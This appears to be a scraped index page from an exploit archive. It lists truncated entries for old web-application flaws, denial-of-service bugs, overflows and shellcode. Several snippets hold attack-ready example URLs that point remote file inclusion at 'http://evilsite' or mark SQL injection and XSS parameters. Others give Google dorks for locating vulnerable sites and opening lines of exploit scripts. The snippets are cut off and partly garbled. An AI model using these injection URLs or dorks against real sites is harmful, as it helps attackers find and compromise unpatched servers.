YLZH(right.php)Cross Site Scripting

========================== Discovery By: Breeeeh Site: www.alshmokh.com E-mail: [email protected] ========================== Example: /right.php?deptid=XSS...

RaceEventManagement.txt

============================ Discovery By: Mr-X Site: www.alshmokh.com E-mail: [email protected] =========================== Example: /nennung.php?pid=SQL /nennung.php?pid=XSS...

confixx312.txt

// Confixx 3.1.2 XSSdiv style= - Googledork: inurl:confixx inurl:login|anmeldung + Greetz to: Bluegeek + Visit: www.LoK-Crew.de...

radlance.txt

Discovered And Coded By Mr.CrackerZ Exploit Code !/usr/bin/perl Discovered and coded by Mr.CrackerZ Security Team Contact me [email protected] Usage: radlance.pl Google: Powered by: RadLance Gold v7 Tested Under RadLance Gold v7 Local Inclusion Exploit Example:...

linux/x86 SET_PORT() portbind 100 bytes

Exploit for linux/x86 platform in category shellcode ======================================= linux/x86 SETPORT portbind 100 bytes ======================================= /--------------------------------------------------------------------------- 100 byte Portbind shellcode by Benjamin Orozco -...

fastclick238.txt

Fast Click ----------- Fix : Contact the Vendor =========================================================== Aria Security Research Http://www.aria-security.net...

Limbo CMS <= 1.0.4.2 (catid) Remote SQL Injection Exploit

No description provided by source. pre i Limbo CMS option=weblinks sql injection exploit i coded by Oo ?php if !isset$GET'host' || !isset$GET'path' || !isset$GET'id' ? Usage: ?echo htmlentities$PHPSELF??host=hostname&path=limbopath&id=userid Exemple: ?echo...

axoverzicht.cgi<==Remote File Inclusion

foud by::::.CrAzY CrAcKeR.::::: Site: http://www.alshmokh.com nono225-mHOn-rageh-port-Lover hacker-Breeeeh -------example: http://target.com/path/axoverzicht.cgi?maand=http://evilsite --------google: inurl:"axoverzicht.cgi?maand";...

PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "\r\n"; echo " PHPSurveyor = 0.995 'save.php/surveyid' remote cmmnds xctn \r\n"; echo " by rgod [email protected] site: http://retrogod.altervista.org \r\n"; echo " a special tnX goes to Frozen for his dork! \r\n"; ech...

Autonomous LAN party File iNclusion

Autonomous LAN party File iNclusion -------------------------------------------- Site:http://www.nerdclub.net/alp/ Demo:http://www.redfiles.net/cup/credits.php -------------------------------------------- Example: http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite...

PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit

No description provided by source. / GNU PeerCast = v0.1216 Remote Exploit ====================================== PeerCast is a simple, free way to listen to radio and watch video on the internet. A remotely exploitable buffer overflow has been identified by INFIGO-2006-03-01 which can be...

UnrealIRCd 3.x - Remote Denial of Service

UnrealIRCd 3.x - Remote Denial of Service source: https://www.securityfocus.com/bid/17057/info UnrealIRCd is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. !/usr/bin/perl Denial of Service exploit for UnrealIRCd...

TotalECommerceSQL.txt

--Security Report-- Advisory: TotalECommerce index.asp id Remote SQL Injection Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 04/03/06 04:36 AM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: TotalECommerce...

Ipswitch WhatsUp Professional 2006 - Remote Denial of Service

Ipswitch WhatsUp Professional 2006 - Remote Denial of Service source: https://www.securityfocus.com/bid/16771/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET...

Ipswitch WhatsUp Professional 2006 - Remote Denial of Service

source: https://www.securityfocus.com/bid/16771/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests. This issue allows remote attackers to consume excessive...

V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/16706/info V-webmail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the browser of an...

Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit

No description provided by source. / gexp-powerd.c Power Daemon v2.0.2 Remote Format String Exploit Copyright C 2005 Gotfault Security Bug found and developed by: barros and xgc Original Reference: http://gotfault.net/research/exploit/gexp-powerd.c / include getopt.h include sys/types.h include...

Nuked-klaN Cross-Site Scripting Vulnerability

NightWarriorKurdish Hacker nightwarrior771athotmail.com Nuked-klaN Cross-Site Scripting Vulnerability http://www.nuked-klan.org http://www.example.com/index.php?file=Members&letter=XSS Contact :nightwarrior771athotmail.com NightWarriorKurdihs Hacker...

win32 WinExec Command Parameter 104+ bytes

win32 WinExec Command Parameter 104+ bytes. Shellcode exploit for win32 platform ; ; relocateable dynamic runtime assembly code example using hash lookup ; ; WinExec with ExitThread ; 104 bytes ; ; for testing: ; ; ml /c /coff /Cp wexec2.asm ; link /subsystem:windows /section:.text,w wexec2.obj ;...

linux/x86 normal exit w/ random (so to speak) return value 5 bytes

Exploit for linux/x86 platform in category shellcode ================================================================== linux/x86 normal exit w/ random so to speak return value 5 bytes ================================================================== / linux/x86 normal exit w/ random so to speak...